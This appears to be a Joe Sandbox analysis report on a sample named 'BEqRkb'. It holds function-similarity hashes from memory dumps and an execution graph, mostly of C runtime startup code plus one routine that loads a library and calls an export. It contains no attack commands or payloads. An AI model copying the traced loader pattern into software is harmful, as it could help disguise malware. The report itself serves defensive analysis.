                                                                                        • Source File: 00000004.00000002.2271432825.00007FFE1A511000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A510000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2271420314.00007FFE1A510000.00000002.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2271452651.00007FFE1A522000.00000002.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2271467117.00007FFE1A52D000.00000004.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2271479904.00007FFE1A52F000.00000002.00000001.01000000.00000009.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_7ffe1a510000_BEqRkb.jbxd
                                                                                        Similarity
                                                                                        • API ID: ConsoleErrorLastMode
                                                                                        • String ID:
                                                                                        • API String ID: 953036326-0
                                                                                        • Opcode ID: 011e2ebe13567d8ad8ddad1d699b44402174a3121c3ef3043a650edb943c864e
                                                                                        • Instruction ID: 8209a21af82db85e05bf9a8d19e659e7deeeb1412c212b39ada2aaaf9940838b
                                                                                        • Opcode Fuzzy Hash: 011e2ebe13567d8ad8ddad1d699b44402174a3121c3ef3043a650edb943c864e
                                                                                        • Instruction Fuzzy Hash: 0191B3A2F1CE5185F7509B6694806BC2BA2AB06FA8F1441FBDE0E576A4DF38D486D700
                                                                                        APIs
                                                                                        • EnterCriticalSection.KERNEL32(?,?,?,0000000140003E7A,?,?,?,?,00000000,00000001400022A6), ref: 0000000140004774
                                                                                        • ResetEvent.KERNEL32(?,?,?,0000000140003E7A,?,?,?,?,00000000,00000001400022A6), ref: 0000000140004870
                                                                                        • SetEvent.KERNEL32(?,?,?,0000000140003E7A,?,?,?,?,00000000,00000001400022A6), ref: 000000014000487D
                                                                                        • LeaveCriticalSection.KERNEL32(?,?,?,0000000140003E7A,?,?,?,?,00000000,00000001400022A6), ref: 000000014000488A
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2271364265.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2271351725.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                                                                        • Associated: 00000004.00000002.2271380467.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                                                                        • Associated: 00000004.00000002.2271393735.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                                                                        • Associated: 00000004.00000002.2271406712.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_140000000_BEqRkb.jbxd
                                                                                        Similarity
                                                                                        • API ID: CriticalEventSection$EnterLeaveReset
                                                                                        • String ID:
                                                                                        • API String ID: 3553466030-0
                                                                                        • Opcode ID: c0905a8df1c3b6d7d2917c1fcaa4435d9a1a27abfa891a899b8a9d6119ba031b
                                                                                        • Instruction ID: 8df361fa7c869b6ec715234f9c2df2ced8c6baf833446e4218a9444c3b5dacad
                                                                                        • Opcode Fuzzy Hash: c0905a8df1c3b6d7d2917c1fcaa4435d9a1a27abfa891a899b8a9d6119ba031b
                                                                                        • Instruction Fuzzy Hash: 0F31D1B5614F4881EB42CB57F8803D463A6B79CBD4F984516EB0E8B372EF3AC4958304
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2271364265.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2271351725.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                                                                        • Associated: 00000004.00000002.2271380467.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                                                                        • Associated: 00000004.00000002.2271393735.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                                                                        • Associated: 00000004.00000002.2271406712.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_140000000_BEqRkb.jbxd
                                                                                        Similarity
                                                                                        • API ID: CriticalEventSection$EnterLeaveReset
                                                                                        • String ID:
                                                                                        • API String ID: 3553466030-0
                                                                                        • Opcode ID: 6e550663b123c7b4300ff756dd79b72a11867f34fdb7ecd18ec55ee4b4ab60ba
                                                                                        • Instruction ID: 80aeca48758360c6ba791d23c15ba34d7cc547f8c7a26c6fbcbbb07f4ec0a80e
                                                                                        • Opcode Fuzzy Hash: 6e550663b123c7b4300ff756dd79b72a11867f34fdb7ecd18ec55ee4b4ab60ba
                                                                                        • Instruction Fuzzy Hash: 6F3127B2220A8483D761DF27F48439AB3A0F798BD4F000116EB8A47BB5DF39E491C344
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2271432825.00007FFE1A511000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A510000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2271420314.00007FFE1A510000.00000002.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2271452651.00007FFE1A522000.00000002.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2271467117.00007FFE1A52D000.00000004.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2271479904.00007FFE1A52F000.00000002.00000001.01000000.00000009.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_7ffe1a510000_BEqRkb.jbxd
                                                                                        Similarity
                                                                                        • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                        • String ID:
                                                                                        • API String ID: 2933794660-0
                                                                                        • Opcode ID: 540efdc4acb7237d38814a0210c5b4881e051432956c40de0382b68ade111df8
                                                                                        • Instruction ID: 99074bbcaeb6ee96d02f745326b2312403cfb503c9c3e2833dcdd3fb923fde4c
                                                                                        • Opcode Fuzzy Hash: 540efdc4acb7237d38814a0210c5b4881e051432956c40de0382b68ade111df8
                                                                                        • Instruction Fuzzy Hash: 53111C26B18F018AEB008BA1E8556B833A5F75AB68F440A72DA6D467B4EF7CD159C340
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2271364265.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2271351725.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                                                                        • Associated: 00000004.00000002.2271380467.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                                                                        • Associated: 00000004.00000002.2271393735.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                                                                        • Associated: 00000004.00000002.2271406712.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_140000000_BEqRkb.jbxd
                                                                                        Similarity
                                                                                        • API ID: CreateEvent$CriticalInitializeSection
                                                                                        • String ID:
                                                                                        • API String ID: 926662266-0
                                                                                        • Opcode ID: 6e7557a2c0ebfea515044b23bc829654ad5a6134d5329468471647cedafa6715
                                                                                        • Instruction ID: 312f8d8d13b8a868d26f937b45fb8075aed367f1a83d8c92d196673213f535ba
                                                                                        • Opcode Fuzzy Hash: 6e7557a2c0ebfea515044b23bc829654ad5a6134d5329468471647cedafa6715
                                                                                        • Instruction Fuzzy Hash: 8F015A31610F0582E726DFA2B855BCA37E2F75D385F854529FA4A8B630EF3A8145C700
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2271432825.00007FFE1A511000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A510000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2271420314.00007FFE1A510000.00000002.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2271452651.00007FFE1A522000.00000002.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2271467117.00007FFE1A52D000.00000004.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2271479904.00007FFE1A52F000.00000002.00000001.01000000.00000009.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_7ffe1a510000_BEqRkb.jbxd
                                                                                        Similarity
                                                                                        • API ID: __except_validate_context_record
                                                                                        • String ID: csm$csm
                                                                                        • API String ID: 1467352782-3733052814
                                                                                        • Opcode ID: 7b854735182fbbf9032f6bb379489979c6e7540e10eb2e5c3fda445f13d9ec39
                                                                                        • Instruction ID: cc163d2ed52992b12ccb5b176fd598443197ca996c9be1a7dd019399f5a25fae
                                                                                        • Opcode Fuzzy Hash: 7b854735182fbbf9032f6bb379489979c6e7540e10eb2e5c3fda445f13d9ec39
                                                                                        • Instruction Fuzzy Hash: 79718272B0CA818AD7608F26D444B7D7BA2EB06FA8F1881F6DE4C47AA5CB3CD551C740
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2271432825.00007FFE1A511000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A510000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2271420314.00007FFE1A510000.00000002.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2271452651.00007FFE1A522000.00000002.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2271467117.00007FFE1A52D000.00000004.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2271479904.00007FFE1A52F000.00000002.00000001.01000000.00000009.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_7ffe1a510000_BEqRkb.jbxd
                                                                                        Similarity
                                                                                        • API ID: CreateFrameInfo__except_validate_context_record
                                                                                        • String ID: csm
                                                                                        • API String ID: 2558813199-1018135373
                                                                                        • Opcode ID: fdc43af78747129a673bd1320e44d2e2152711131f73500a528a0e9cffec3944
                                                                                        • Instruction ID: 17a6df69f5b8bd89d9d2f92c59730d1f10af3a9a6bddec5e78e0965cb6eeaf45
                                                                                        • Opcode Fuzzy Hash: fdc43af78747129a673bd1320e44d2e2152711131f73500a528a0e9cffec3944
                                                                                        • Instruction Fuzzy Hash: 71514D3671DB4196D660AF16A04127D7BA5FB8AFB0F1005B6EB8D07B66DF38E451CB00
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2271432825.00007FFE1A511000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A510000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2271420314.00007FFE1A510000.00000002.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2271452651.00007FFE1A522000.00000002.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2271467117.00007FFE1A52D000.00000004.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2271479904.00007FFE1A52F000.00000002.00000001.01000000.00000009.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_7ffe1a510000_BEqRkb.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorFileLastWrite
                                                                                        • String ID: U
                                                                                        • API String ID: 442123175-4171548499
                                                                                        • Opcode ID: 1bda24f103a1684070c02434e8f6c76fd55582b454c16690d6623519bbb42c9a
                                                                                        • Instruction ID: e5cc03a6032945dbccd653eb8707596d6f43ec8a5330c4b63f0d1ae64d07c29a
                                                                                        • Opcode Fuzzy Hash: 1bda24f103a1684070c02434e8f6c76fd55582b454c16690d6623519bbb42c9a
                                                                                        • Instruction Fuzzy Hash: FE41A562B1DA4181DB20CF66E4443BA7762FB99BA4F4541B2EE4E877A4EF3CD441CB40
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2271364265.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2271351725.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                                                                        • Associated: 00000004.00000002.2271380467.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                                                                        • Associated: 00000004.00000002.2271393735.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                                                                        • Associated: 00000004.00000002.2271406712.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_140000000_BEqRkb.jbxd
                                                                                        Similarity
                                                                                        • API ID: ExceptionRaise
                                                                                        • String ID: csm
                                                                                        • API String ID: 3997070919-1018135373
                                                                                        • Opcode ID: dba88b77ed38871436108f768fa7b3f2c7bfcf036fc2a4a051b753ac1ce5513b
                                                                                        • Instruction ID: 49e9958dea4625aba6399e71a496f31833793ec74c7c4936f150dd50c3eb5df3
                                                                                        • Opcode Fuzzy Hash: dba88b77ed38871436108f768fa7b3f2c7bfcf036fc2a4a051b753ac1ce5513b
                                                                                        • Instruction Fuzzy Hash: 1D315036204A8082D771CF16E09079EB365F78C7E4F544111EF9A077B5DB3AD892CB41
                                                                                        APIs
                                                                                          • Part of subcall function 00007FFE1A513A38: __except_validate_context_record.LIBVCRUNTIME ref: 00007FFE1A513A63
                                                                                        • __GSHandlerCheckCommon.LIBCMT ref: 00007FFE1A520993
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2271432825.00007FFE1A511000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A510000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2271420314.00007FFE1A510000.00000002.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2271452651.00007FFE1A522000.00000002.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2271467117.00007FFE1A52D000.00000004.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2271479904.00007FFE1A52F000.00000002.00000001.01000000.00000009.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_7ffe1a510000_BEqRkb.jbxd
                                                                                        Similarity
                                                                                        • API ID: CheckCommonHandler__except_validate_context_record
                                                                                        • String ID: csm$f
                                                                                        • API String ID: 1543384424-629598281
                                                                                        • Opcode ID: df4735a4e908aa111fba586a5857847e844898d503be1ccfbed92f1abe6d2401
                                                                                        • Instruction ID: 4767d3139cfe538b553dffc3081010f9f75b09a9a966cdfcf56a0960c06ceb7d
                                                                                        • Opcode Fuzzy Hash: df4735a4e908aa111fba586a5857847e844898d503be1ccfbed92f1abe6d2401
                                                                                        • Instruction Fuzzy Hash: 9211E172B18B81C5E7549F23A0411B97B66EB46FE0F0880B6EE880BB66CE38DC51C700
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2271364265.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2271351725.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                                                                        • Associated: 00000004.00000002.2271380467.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                                                                        • Associated: 00000004.00000002.2271393735.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                                                                        • Associated: 00000004.00000002.2271406712.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_140000000_BEqRkb.jbxd
                                                                                        Similarity
                                                                                        • API ID: TimerWaitable
                                                                                        • String ID: amps_Set: pHandle=%p, propId=%d, val=%p, vSize=%d
                                                                                        • API String ID: 1823812067-484248852
                                                                                        • Opcode ID: 590ed17bb6164494f623543e183e49ebce91c212c09f63c64337d20ba62503d7
                                                                                        • Instruction ID: 814455377fd743a09d1ce94c7697c2570c7384a68551c8a3e3690f56dccab0e4
                                                                                        • Opcode Fuzzy Hash: 590ed17bb6164494f623543e183e49ebce91c212c09f63c64337d20ba62503d7
                                                                                        • Instruction Fuzzy Hash: 25114975608B4082EB21CF16B84079AB7A4F79DBD4F544225FF8847B79DB39C5508B40
                                                                                        APIs
                                                                                        • RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,?,00007FFE1A51112F), ref: 00007FFE1A5139E0
                                                                                        • RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,00007FFE1A51112F), ref: 00007FFE1A513A21
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2271432825.00007FFE1A511000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A510000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2271420314.00007FFE1A510000.00000002.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2271452651.00007FFE1A522000.00000002.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2271467117.00007FFE1A52D000.00000004.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2271479904.00007FFE1A52F000.00000002.00000001.01000000.00000009.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_7ffe1a510000_BEqRkb.jbxd
                                                                                        Similarity
                                                                                        • API ID: ExceptionFileHeaderRaise
                                                                                        • String ID: csm
                                                                                        • API String ID: 2573137834-1018135373
                                                                                        • Opcode ID: 886c576564c2cc2de453fb1cc39b3a925429a78efbd1798258f32c7f13ed655c
                                                                                        • Instruction ID: 5d0314be8a28072ba4f3b46a76935b8f9882d3f4705911f625d1c289e4b4dd63
                                                                                        • Opcode Fuzzy Hash: 886c576564c2cc2de453fb1cc39b3a925429a78efbd1798258f32c7f13ed655c
                                                                                        • Instruction Fuzzy Hash: E1114C3660CF8182EB608F16E4102797BE5FB89BA4F5842B2DE8D07769EF3CD5518B00
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2271364265.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2271351725.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                                                                        • Associated: 00000004.00000002.2271380467.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                                                                        • Associated: 00000004.00000002.2271393735.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                                                                        • Associated: 00000004.00000002.2271406712.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_140000000_BEqRkb.jbxd
                                                                                        Similarity
                                                                                        • API ID: TimerWaitable
                                                                                        • String ID: amps_Get: pHandle=%p, propId=%d, val=%p, vSize=%d
                                                                                        • API String ID: 1823812067-3336177065
                                                                                        • Opcode ID: ec5ea581405e177efc46dfcfb63def396c6c184119c2e2df6ecfca0784b7c7fe
                                                                                        • Instruction ID: 709d983207ec740d9f2c7308925ee729c80a4ac6442fb255827ec98b57545574
                                                                                        • Opcode Fuzzy Hash: ec5ea581405e177efc46dfcfb63def396c6c184119c2e2df6ecfca0784b7c7fe
                                                                                        • Instruction Fuzzy Hash: 731170B2614B8082D711CF16F480B9AB7A4F38CBE4F444216BF9C47B68CF78C5508B40
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2271364265.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2271351725.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                                                                        • Associated: 00000004.00000002.2271380467.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                                                                        • Associated: 00000004.00000002.2271393735.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                                                                        • Associated: 00000004.00000002.2271406712.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_140000000_BEqRkb.jbxd
                                                                                        Similarity
                                                                                        • API ID: Heap$FreeProcess
                                                                                        • String ID:
                                                                                        • API String ID: 3859560861-0
                                                                                        • Opcode ID: 57607852ce15da45032583eecf595b266eb818b51a75700467a9fc2c410260bf
                                                                                        • Instruction ID: 86a4b35954e85bb75ec39e114bccfc50e282ec3ca0152174d73c8df7cd9b4be4
                                                                                        • Opcode Fuzzy Hash: 57607852ce15da45032583eecf595b266eb818b51a75700467a9fc2c410260bf
                                                                                        • Instruction Fuzzy Hash: ADF07FB4615B4481FB078FA7B84479422E5EB4DBC0F481028AB494B3B0DF7A80998710

                                                                                        Execution Graph

                                                                                        Execution Coverage:3.7%
                                                                                        Dynamic/Decrypted Code Coverage:26.7%
                                                                                        Signature Coverage:1.3%
                                                                                        Total number of Nodes:1110
                                                                                        Total number of Limit Nodes:28
3636->3682 3638 b21110 GetStartupInfoW 3640 b21133 3638->3640 3683 b2261b HeapCreate 3640->3683 3642 b21183 3748 b2248e GetModuleHandleW 3642->3748 3645 b21189 3646 b21195 __RTC_Initialize 3645->3646 3647 b2118d 3645->3647 3685 b21dde 3646->3685 3648 b210db _fast_error_exit 66 API calls 3647->3648 3649 b21194 3648->3649 3649->3646 3651 b211a2 3652 b211a6 3651->3652 3653 b211ae GetCommandLineW 3651->3653 3781 b21411 3652->3781 3700 b21d81 GetEnvironmentStringsW 3653->3700 3657 b211bd 3788 b21cd3 GetModuleFileNameW 3657->3788 3659 b211c7 3660 b211d3 3659->3660 3661 b211cb 3659->3661 3708 b21aa4 3660->3708 3663 b21411 __amsg_exit 66 API calls 3661->3663 3665 b211d2 3663->3665 3665->3660 3666 b211e4 3720 b214d0 3666->3720 3667 b211dc 3668 b21411 __amsg_exit 66 API calls 3667->3668 3670 b211e3 3668->3670 3670->3666 3671 b211ea 3672 b211ef 3671->3672 3675 b211f6 __wwincmdln 3671->3675 3673 b21411 __amsg_exit 66 API calls 3672->3673 3674 b211f5 3673->3674 3674->3675 3675->3674 3726 b21000 CoInitialize CreateMutexW 3675->3726 3677 b21216 3678 b21224 3677->3678 3792 b21681 3677->3792 3795 b216ad 3678->3795 3681 b21229 _raise 3682->3638 3684 b21177 3683->3684 3684->3642 3740 b210db 3684->3740 3798 b2264c 3685->3798 3687 b21dea GetStartupInfoA 3799 b23730 3687->3799 3689 b22029 _raise 3689->3651 3690 b21fa6 GetStdHandle 3695 b21f70 3690->3695 3691 b2200b SetHandleCount 3691->3689 3692 b23730 __calloc_crt 66 API calls 3696 b21e0b 3692->3696 3693 b21fb8 GetFileType 3693->3695 3694 b21ef3 3694->3689 3694->3695 3698 b21f1c GetFileType 3694->3698 3804 b2317c 3694->3804 3695->3689 3695->3690 3695->3691 3695->3693 3697 b2317c __mtinitlocknum InitializeCriticalSectionAndSpinCount 3695->3697 3696->3689 3696->3692 3696->3694 3696->3695 3697->3695 3698->3694 3701 b21d92 3700->3701 3702 b21d96 3700->3702 3701->3657 3703 b236eb __malloc_crt 66 API calls 3702->3703 3704 b21db7 3703->3704 3705 b21dbe FreeEnvironmentStringsW 3704->3705 4158 b237f0 3704->4158 3705->3657 3709 b21abc _wcslen 
3708->3709 3713 b211d8 3708->3713 3710 b23730 __calloc_crt 66 API calls 3709->3710 3718 b21ae0 _wcslen 3710->3718 3711 b21b45 3712 b235ee __mtinitlocknum 66 API calls 3711->3712 3712->3713 3713->3666 3713->3667 3714 b23730 __calloc_crt 66 API calls 3714->3718 3715 b21b6b 3716 b235ee __mtinitlocknum 66 API calls 3715->3716 3716->3713 3718->3711 3718->3713 3718->3714 3718->3715 3719 b22ae2 __invoke_watson 10 API calls 3718->3719 4162 b2367c 3718->4162 3719->3718 3721 b214de __IsNonwritableInCurrentImage 3720->3721 4171 b22dc3 3721->4171 3723 b214fc __initterm_e 3725 b2151b __IsNonwritableInCurrentImage __initterm 3723->3725 4175 b22dac 3723->4175 3725->3671 3727 b21035 GetCommandLineW CommandLineToArgvW 3726->3727 3728 b2101f GetLastError 3726->3728 3730 b21067 3727->3730 3731 b21056 PathFileExistsW 3727->3731 3728->3727 3729 b2102c 3728->3729 3729->3677 3733 b21084 LoadLibraryW 3730->3733 3731->3730 3732 b2106e PathFileExistsW 3731->3732 3732->3730 3732->3733 3734 b21091 GetProcAddress 3733->3734 3735 b210aa CloseHandle CoUninitialize 3733->3735 3738 b210a3 FreeLibrary 3734->3738 3739 b210a1 3734->3739 3736 b210c2 3735->3736 3737 b210bb LocalFree 3735->3737 3736->3677 3737->3736 3738->3735 3739->3738 3741 b210e9 3740->3741 3742 b210ee 3740->3742 3743 b218c4 __FF_MSGBANNER 66 API calls 3741->3743 3744 b21719 __NMSG_WRITE 66 API calls 3742->3744 3743->3742 3745 b210f6 3744->3745 3746 b21465 __mtinitlocknum 3 API calls 3745->3746 3747 b21100 3746->3747 3747->3642 3749 b224a2 3748->3749 3750 b224a8 3748->3750 3751 b213e1 __crt_waiting_on_module_handle 2 API calls 3749->3751 3752 b224b3 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 3750->3752 3753 b22611 3750->3753 3751->3750 3755 b224fc TlsAlloc 3752->3755 4287 b221a8 3753->4287 3757 b22616 3755->3757 3758 b2254a TlsSetValue 3755->3758 3757->3645 3758->3757 3759 b2255b 3758->3759 4276 b216cb 3759->4276 3762 b2207e __encode_pointer 6 API calls 3763 b2256b 3762->3763 3764 b2207e __encode_pointer 6 API calls 
3763->3764 3765 b2257b 3764->3765 3766 b2207e __encode_pointer 6 API calls 3765->3766 3767 b2258b 3766->3767 3768 b2207e __encode_pointer 6 API calls 3767->3768 3769 b2259b 3768->3769 4283 b22924 3769->4283 3772 b220f9 __decode_pointer 6 API calls 3773 b225bc 3772->3773 3773->3753 3774 b23730 __calloc_crt 66 API calls 3773->3774 3775 b225d5 3774->3775 3775->3753 3776 b220f9 __decode_pointer 6 API calls 3775->3776 3777 b225ef 3776->3777 3777->3753 3778 b225f6 3777->3778 3779 b221e5 __mtinit 66 API calls 3778->3779 3780 b225fe GetCurrentThreadId 3779->3780 3780->3757 3782 b218c4 __FF_MSGBANNER 66 API calls 3781->3782 3783 b2141b 3782->3783 3784 b21719 __NMSG_WRITE 66 API calls 3783->3784 3785 b21423 3784->3785 3786 b220f9 __decode_pointer 6 API calls 3785->3786 3787 b211ad 3786->3787 3787->3653 3789 b21d08 _wparse_cmdline 3788->3789 3790 b236eb __malloc_crt 66 API calls 3789->3790 3791 b21d4b _wparse_cmdline 3789->3791 3790->3791 3791->3659 4301 b21555 3792->4301 3794 b21692 3794->3678 3796 b21555 _doexit 66 API calls 3795->3796 3797 b216b8 3796->3797 3797->3681 3798->3687 3800 b23739 3799->3800 3802 b23776 3800->3802 3803 b23757 Sleep 3800->3803 3808 b2557f 3800->3808 3802->3696 3803->3800 4157 b2264c 3804->4157 3806 b23188 InitializeCriticalSectionAndSpinCount 3807 b231cc _raise 3806->3807 3807->3694 3809 b2558b _raise 3808->3809 3810 b255a3 3809->3810 3820 b255c2 __setmbcp_nolock 3809->3820 3821 b22c72 3810->3821 3814 b25634 HeapAlloc 3814->3820 3817 b255b8 _raise 3817->3800 3820->3814 3820->3817 3827 b22aa0 3820->3827 3834 b24dc3 3820->3834 3840 b2567b 3820->3840 3843 b231eb 3820->3843 3846 b222cc GetLastError 3821->3846 3823 b22c77 3824 b22c0a 3823->3824 3825 b220f9 __decode_pointer 6 API calls 3824->3825 3826 b22c1a __invoke_watson 3825->3826 3828 b22ab5 3827->3828 3829 b22ac8 EnterCriticalSection 3827->3829 3941 b229dd 3828->3941 3829->3820 3831 b22abb 3831->3829 3832 b21411 __amsg_exit 65 API calls 3831->3832 3833 b22ac7 3832->3833 3833->3829 3836 b24df1 
3834->3836 3835 b24e8a 3839 b24e93 3835->3839 4152 b249da 3835->4152 3836->3835 3836->3839 4145 b2492a 3836->4145 3839->3820 4156 b229c6 LeaveCriticalSection 3840->4156 3842 b25682 3842->3820 3844 b220f9 __decode_pointer 6 API calls 3843->3844 3845 b231fb 3844->3845 3845->3820 3860 b22174 TlsGetValue 3846->3860 3849 b22339 SetLastError 3849->3823 3850 b23730 __calloc_crt 63 API calls 3851 b222f7 3850->3851 3851->3849 3865 b220f9 TlsGetValue 3851->3865 3854 b22330 3893 b235ee 3854->3893 3855 b22318 3875 b221e5 3855->3875 3858 b22320 GetCurrentThreadId 3858->3849 3859 b22336 3859->3849 3861 b221a4 3860->3861 3862 b22189 3860->3862 3861->3849 3861->3850 3863 b220f9 __decode_pointer 6 API calls 3862->3863 3864 b22194 TlsSetValue 3863->3864 3864->3861 3866 b22132 GetModuleHandleW 3865->3866 3867 b22111 3865->3867 3869 b22142 3866->3869 3870 b2214d GetProcAddress 3866->3870 3867->3866 3868 b2211b TlsGetValue 3867->3868 3873 b22126 3868->3873 3906 b213e1 3869->3906 3872 b2212a 3870->3872 3872->3854 3872->3855 3873->3866 3873->3872 3910 b2264c 3875->3910 3877 b221f1 GetModuleHandleW 3878 b22201 3877->3878 3879 b22207 3877->3879 3880 b213e1 __crt_waiting_on_module_handle 2 API calls 3878->3880 3881 b22243 3879->3881 3882 b2221f GetProcAddress GetProcAddress 3879->3882 3880->3879 3883 b22aa0 __lock 62 API calls 3881->3883 3882->3881 3884 b22262 InterlockedIncrement 3883->3884 3911 b222ba 3884->3911 3887 b22aa0 __lock 62 API calls 3888 b22283 3887->3888 3914 b23c9e InterlockedIncrement 3888->3914 3890 b222a1 3926 b222c3 3890->3926 3892 b222ae _raise 3892->3858 3894 b235fa _raise 3893->3894 3895 b23639 3894->3895 3897 b22aa0 __lock 64 API calls 3894->3897 3898 b23673 